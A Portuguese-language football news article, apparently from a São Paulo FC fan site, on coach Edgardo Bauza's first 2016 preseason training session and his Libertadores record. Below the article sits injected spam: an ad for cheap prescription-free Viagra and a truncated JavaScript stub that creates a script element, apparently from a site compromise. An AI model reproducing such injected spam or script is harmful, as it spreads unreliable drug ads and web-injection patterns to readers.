Noticias

“O primeiro contato com os atletas foi realmente muito bom”

A apresentação do elenco são-paulino nesta quarta-feira (6), no Centro de Treinamento da Barra Funda, não só abriu os preparativos do Tricolor na pré-temporada 2016, como proporcionou o primeiro contato do recém-contratado técnico Edgardo Bauza e o elenco. E a primeira impressão dos novos comandados animou Patón, que supervisionou as atividades desta tarde e pôde conhecer melhor os jogadores são-paulinos.

“O primeiro contato com os atletas foi realmente muito bom. Após a apresentação, pude conhecê-los melhor e aprender um pouco mais sobre cada um. Além disso, também tive a oportunidade de conversar com os outros membros da comissão técnica, que me ajudaram bastante. A diretoria do clube nos abriu as portas, e estamos contentes e motivados para fazer um grande trabalho e conquistar títulos, porque é isso que todos nós queremos”, revelou o comandante.

Bicampeão da Libertadores da América, em 2008 pela LDU-EQU e em 2014 pelo San Lorenzo-ARG, Patón conhece bem o torneio internacional. Por isso, para estrear bem e conquistar um resultado positivo diante do Cesar Vallejo-PER, que decidirá com o clube brasileiro uma vaga no Grupo 1 da competição, Bauza já começou a pré-temporada com um trabalho com bola para poder aos poucos aprimorar as partes física e técnica dos jogadores.

“Encontramos uma boa resposta dos atletas neste primeiro dia de treino. O trabalho foi bom, leve, mas nos próximos dias será mais duro e intenso. Já definimos uma programação, e agora vamos trabalhar para chegar bem na estreia, porque é isso que devemos fazer. Queremos aproveitar este período de treinos para conhecer melhor os jogadores e condicioná-los para os campeonatos que teremos pela frente”, finalizou o experiente comandante.


Vale destacar que Bauza comandou o San Lorenzo nas duas últimas temporadas. Em 2014, foi um dos principais responsáveis por levar a tradicional equipe argentina a inédita conquista da Copa Libertadores da América. Em 2015, ficou com o vice-campeonato nacional e classificou seu antigo clube para a fase de grupos da competição continental do ano que vem.

Antes de brilhar na Argentina, o treinador obteve destaque em outro país sul-americano. Com quatro títulos, escreveu seu nome na história da LDU, de Quito. Em 2008, fez história no Equador ao levar a equipe a conquista da primeira Libertadores da América, o único título do país até hoje na competição. Conquistou ainda uma Recopa e dois campeonatos nacionais.

Fonte: SiteOficial

cheap pills Buy cheap Viagra online

to order at an easy rate generic pills without prescription var d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Noticias

Mais em Noticias

Jucilei crê em permanência no São Paulo e lamenta “ano de chacota”

saopauloadmin20 de novembro de 2017

Petros e Jucilei: donos do meio de campo tricolor

saopauloadmin14 de novembro de 2017

Dorival analisa empate e elogia torcida são-paulina

saopauloadmin12 de novembro de 2017

Kaká ainda não definiu futuro e pode ter se despedido do futebol no último sábado

saopauloadmin11 de novembro de 2017

Hernanes falou sobre o bom momento e brinca sobre jogos do SP: “Uns 50 iam para o hospital no fim”

saopauloadmin7 de novembro de 2017

Meta, consistência e ambiente: elenco avalia momento tricolor

saopauloadmin5 de novembro de 2017

7 empresas negociam com o São Paulo para estampar camisa em 2018

saopauloadmin2 de novembro de 2017

‘Superprofeta’!

saopauloadmin30 de outubro de 2017

CHANCELA DA FIFA TEM IMPORTÂNCIA ZERO PARA O TORCEDOR QUE VIVEU OS MUNDIAIS

saopauloadmin27 de outubro de 2017